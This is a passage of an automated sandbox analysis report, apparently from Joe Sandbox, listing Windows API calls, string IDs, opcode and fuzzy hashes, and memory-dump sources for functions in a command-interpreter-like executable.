                                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                              • Instruction Fuzzy Hash: C8519823B0868297EA245F15F6047B9A6A1FB4D7B8F084435DE0AC37A4DF3EE545CB06
                                              APIs
                                              Similarity
                                              • API ID: memset$DriveErrorInformationLastTypeVolume
                                              • String ID:
                                              • API String ID: 850181435-0
                                              • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                              • Instruction ID: 8e3b18f6e5c41660923f9c67f205080ebb5a76db68c77cff41229934961a647d
                                              • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                              • Instruction Fuzzy Hash: 9D418F33608BD1C9E7618F21E8443E977A4FB8DB58F444125DA4D8BBA8CF3AD649C705
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183514
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB183522
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183541
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB18355E
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                              • String ID:
                                              • API String ID: 4057327938-0
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                              • String ID: KEYS$LIST$OFF
                                              • API String ID: 411561164-4129271751
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB180212
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB180228
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB18023C
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB180251
                                              Similarity
                                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                              • String ID:
                                              • API String ID: 513048808-0
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              Similarity
                                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                              • String ID:
                                              • API String ID: 513048808-0
                                              APIs
                                              Similarity
                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                              • String ID:
                                              • API String ID: 4104442557-0
                                              APIs
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1971F9
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB19720D
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB197300
                                                • Part of subcall function 00007FF6EB195740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6EB1975C4,?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB195744
                                              Strings
                                              Similarity
                                              • API ID: OpenSemaphore$CloseErrorHandleLast
                                              • String ID: _p0$wil
                                              • API String ID: 455305043-1814513734
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: wcschr$Heapiswspacememset$AllocProcess
                                              • String ID: %s
                                              • API String ID: 2401724867-3043279178
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: iswdigit
                                              • String ID: GeToken: (%x) '%s'
                                              • API String ID: 3849470556-1994581435
                                              APIs
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB199A10
                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB199994
                                                • Part of subcall function 00007FF6EB19A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                                • Part of subcall function 00007FF6EB19A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                                • Part of subcall function 00007FF6EB19A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              • wcsrchr.MSVCRT ref: 00007FF6EB199A62
                                              Strings
                                              Similarity
                                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                              • String ID: %s=%s$.
                                              • API String ID: 3242694432-4275322459
                                              APIs
                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1954E6
                                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB19552E
                                                • Part of subcall function 00007FF6EB19758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975AE
                                                • Part of subcall function 00007FF6EB19758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975C6
                                              Strings
                                              Similarity
                                              • API ID: ErrorLast$CreateCurrentMutexProcess
                                              • String ID: Local\SM0:%d:%d:%hs$wil$x
                                              • API String ID: 779401067-630742106
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: CurrentDirectorytowupper
                                              • String ID: :$:
                                              • API String ID: 238703822-3780739392
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                              • API String ID: 3677997916-3870813718
                                              • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                              • Instruction ID: c45c1574d6486c540680004834c3663f3f6a7829e90f1c8e84cb4cb73e1d3d6c
                                              • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                              • Instruction Fuzzy Hash: 0411F876619A41C6EA108B50E4847AAF7A4FB8A768F404625DA8D437B8DF7ED048CB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memsetwcsrchr$wcschr
                                              • String ID:
                                              • API String ID: 110935159-0
                                              • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                              • Instruction ID: aead4a5271d757a1fbc08ace71da8e907d736d1e3a24f2baebff2bbe1d7f1ece
                                              • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                              • Instruction Fuzzy Hash: 7651E123B0979285FA218B11E8047F96391BF4EBB8F184130CE5E8B7F4DE7DE145820A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$CurrentDirectorytowupper
                                              • String ID:
                                              • API String ID: 1403193329-0
                                              • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                              • Instruction ID: c84eb3d0226fb3c19044277cd2847dd635530efb3a7e1e18e635fe20a8f099e2
                                              • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                              • Instruction Fuzzy Hash: 4251C127A0568185EB258F60E9007FA77A0FF4DBACF448035CA4D876A4EF3DE544870A
                                              APIs
                                              • memset.MSVCRT ref: 00007FF6EB17921C
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB1793AA
                                                • Part of subcall function 00007FF6EB178B20: wcsrchr.MSVCRT ref: 00007FF6EB178BAB
                                                • Part of subcall function 00007FF6EB178B20: _wcsicmp.MSVCRT ref: 00007FF6EB178BD4
                                                • Part of subcall function 00007FF6EB178B20: _wcsicmp.MSVCRT ref: 00007FF6EB178BF2
                                                • Part of subcall function 00007FF6EB178B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB178C16
                                                • Part of subcall function 00007FF6EB178B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB178C2F
                                                • Part of subcall function 00007FF6EB178B20: wcschr.MSVCRT ref: 00007FF6EB178CB3
                                                • Part of subcall function 00007FF6EB18417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB1841AD
                                                • Part of subcall function 00007FF6EB183060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6EB1792AC), ref: 00007FF6EB1830CA
                                                • Part of subcall function 00007FF6EB183060: SetErrorMode.KERNELBASE ref: 00007FF6EB1830DD
                                                • Part of subcall function 00007FF6EB183060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB1830F6
                                                • Part of subcall function 00007FF6EB183060: SetErrorMode.KERNELBASE ref: 00007FF6EB183106
                                              • wcsrchr.MSVCRT ref: 00007FF6EB1792D8
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB179362
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB179373
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                              • String ID:
                                              • API String ID: 3966000956-0
                                              • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                              • Instruction ID: 3d78af6013d4e41d0c93d6ce5e6be472fe2700800e237354b7da768d55881f6c
                                              • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                              • Instruction Fuzzy Hash: 3051A033A0969296EB618F21D8503F963A0FB8EBA8F144035DA0D877E4DF7EE155C706
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$_setjmp
                                              • String ID:
                                              • API String ID: 3883041866-0
                                              • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                              • Instruction ID: a7e11499ce3c82737efe2efa8c15e63ad534600d989b0701a497a51d08a09c8a
                                              • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                              • Instruction Fuzzy Hash: 67518E33608B868AEB61CF20D8503E977A4FB4A758F404135DA4C8BBA8DF7DD645CB46
                                              APIs
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B4BD
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B518
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B58B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$_wcsicmp$AllocProcess
                                              • String ID: ELSE$IF/?
                                              • API String ID: 3223794493-1134991328
                                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction ID: 4ecfd639badb7d7c9692d92befbe87bbdc9cd53240eb31668fe209f301d186b0
                                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction Fuzzy Hash: DE415823A0D66381FA549B24E4213FA26A1AF4E76CF585035DA0EC73F5DF7EE400874A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                              • String ID:
                                              • API String ID: 1532185241-0
                                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                              • Instruction ID: d27f550a367c2a04a06cbe0a77a67fc87a523bd2846daf9e8267f1c8b28af7e7
                                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                              • Instruction Fuzzy Hash: 3F41E433A0879187E7149B21E4457BD7AA1FB8CB64F448535EA0AC37A4CF3DE845CB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                              • String ID:
                                              • API String ID: 3588551418-0
                                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction ID: df1da2599e1a72d5a78126d29ae598be3ee3754598b874a64c328fba632621e8
                                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction Fuzzy Hash: D3419033A08242CBE7549B11E4503BDB661EF8DBA9F144039D60EC77A5CF7EE840874A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorModememset$FullNamePath_wcsicmp
                                              • String ID:
                                              • API String ID: 2123716050-0
                                              • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                              • Instruction ID: 321507b3bdfb55d4c62833544ebdc456b796fd86ed46305a6c16b0929b9521fb
                                              • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                              • Instruction Fuzzy Hash: 0D418233709BC28AEB718F25D9503E96794FB4D79CF044134DA4D8AAA8DF3DD2488705
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                              • String ID:
                                              • API String ID: 3114114779-0
                                              • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                              • Instruction ID: 24bd55d70eada3d095f0f70444d2f3d6c0292f28f55eb998ca01bc742d86456b
                                              • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                              • Instruction Fuzzy Hash: 74413633A05B52CAE700CFA5E4403EC37A5FB89798F544035EA0D93BA8DF79E4068745
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A7AF
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A80E
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseErrorLastOpen
                                              • String ID:
